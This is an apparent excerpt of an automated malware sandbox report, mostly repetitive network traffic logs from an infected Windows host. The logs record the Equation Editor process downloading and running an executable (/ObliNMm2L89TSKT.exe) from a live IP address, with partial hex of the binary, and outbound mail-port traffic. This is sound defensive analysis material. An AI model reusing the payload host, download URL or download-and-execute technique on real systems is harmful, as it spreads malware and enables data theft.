                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 26 Jul 2022 15:45:45 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29Last-Modified: Tue, 26 Jul 2022 01:46:09 GMTETag: "aa200-5e4ab76f7064a"Accept-Ranges: bytesContent-Length: 696832Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d6 44 df 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 9a 0a 00 00 06 00 00 00 00 00 00 6e b9 0a 00 00 20 00 00 00 c0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 1c b9 0a 00 4f 00 00 00 00 c0 0a 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 99 0a 00 00 20 00 00 00 9a 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b0 03 00 00 00 c0 0a 00 00 04 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 0a 00 00 02 00 00 00 a0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 b9 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 c8 a5 08 00 54 13 02 00 03 00 00 00 19 01 00 06 d8 c7 00 00 f0 dd 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 06 00 00 00 01 00 00 11 28 02 00 00 06 2a 00 00 13 30 05 00 29 01 00 00 02 00 00 11 72 01 00 00 70 0a 06 72 09 00 00 70 28 08 00 00 06 28 09 00 00 06 3a df 00 00 00 20 63 84 df 1a 20 ee 9d 0a 5f 61 25 0c 1e 5e 45 08 00 00 00 35 00 00 00 05 00 00 00 cc ff ff ff 51 00 00 00 ab 00 00 00 7d 00 00 00 bb 00 00 00 61 00 00 00 38 b6 00 00 00 07 28 0d 00 00 06 28 0e 00 00 06 72 1d 00 00 70 28 0f 00 00 06 2c 08 20 a8 01 f7 f2 25 2b 06 20 f9 6d 00 8b 25 26 08 20 f9 5c 80 be 5a 61 2b 9c 07 2d 08 20 b0 97 36 03 25 2b 06 20 3f d7 03 54 25 26 08 20 8e 45 d7 a6 5a 61 2b 80 28 03 00 00 06 0b 20 3e a2 50 5b 38 70 ff ff ff 72 29 00 00 70 28 10 00 00 06 08 20 52 80 cd 65 5a 20 5e 5b 26 5f 61 38 54 ff ff ff 06 72 2b 00 00 70 28 0a 00 00 06 28 0b 00 00 06 2d 08 20 8c fe 22 5f 25 2b 06 20 0b 18 da 51 25 26 08 20 5d f1 60 48 5a 61 38 26 ff ff ff 14 28 0c 00 00 06 20 b5 fb 7a 67 38 16 f
                  Source: global trafficHTTP traffic detected: GET /ObliNMm2L89TSKT.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.174.138.192Connection: Keep-Alive
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 104.149.221.234:587
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035704DE URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035704DE
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 104.149.221.234:587
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
